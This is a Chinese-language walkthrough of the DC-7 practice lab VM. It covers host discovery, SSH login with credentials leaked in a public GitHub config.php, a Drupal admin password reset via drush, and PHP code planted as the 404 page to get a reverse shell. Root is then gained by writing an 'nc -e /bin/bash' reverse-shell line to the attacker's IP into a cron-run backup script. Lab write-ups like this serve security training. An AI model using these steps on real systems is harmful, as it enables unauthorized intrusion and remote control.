环境准备
DC-7靶机链接:百度网盘 请输入提取码
提取码:sii1
虚拟机网络链接模式:桥接模式
攻击机系统:kali linux 2021.1
信息收集
1.探测目标靶机ip
arp-scan -l
2.探测目标靶机开放端口和服务情况
nmap -p- -A -T4 192.168.166.134
漏洞利用
1.查看网页
2.来到http://github.com 找到这个项目
config.php 这个文件下有惊喜
3.用户名:dc7user 密码:MdR3xOgB7#dW
直接尝试ssh登录,发现直接就登进去了
ssh dc7user@192.168.166.134
4.在dc7user用户下有封信 ,查看下
5.发现了一个 /opt/scripts/backups.sh
6.查看权限是root和普通用户才有权限,然后发现上面 的提示有一新的mail,查下看没求用
7.然后就进入到/var/www/html目录下,用drush命令修改www-data的密码
drush upwd admin --password="123456"
8.打开网站尝试使用修改的密码进行登录,发现登录成功
http://192.168.166.134/user/login admin 123456
9.随便点点,发现在content下面能写东西,就是没php,
点击extend在上面添加了插件可以写入php代码。
10.输入url https://ftp.drupal.org/files/projects/php-8.x-1.0.tar.gz 报错了,确实无语
https://ftp.drupal.org/files/projects/php-8.x-1.0.tar.gz 百度登录下载包,选择文件上传
11.成功后 点击中间的添加模块那一行
把这个php filter选上,安装
下载成功 之后就可以直接进行写入文件
12.按照图操作,选择更改404页面
13.把php-reverse-shell.php(github里有)的代码复制下来,换成kali地址即可
权限提升
1.开启监听后,点击404 page 成功反弹shell
2.用python回弹交互式shell 目标,靶机里安装了nc ,把nc反弹shell的命令写入.sh文件中
python -c "import pty;pty.spawn('/bin/bash')"
nc -e /bin/bash 192.168.166.131 5555
3.我一直在等他弹shell,没等来 想着估计时间长,看下计划任务,压根没这个任务,用cat命令看了下,立刻就弹shell了。
不管咋说,最后也是轻松拿下!!!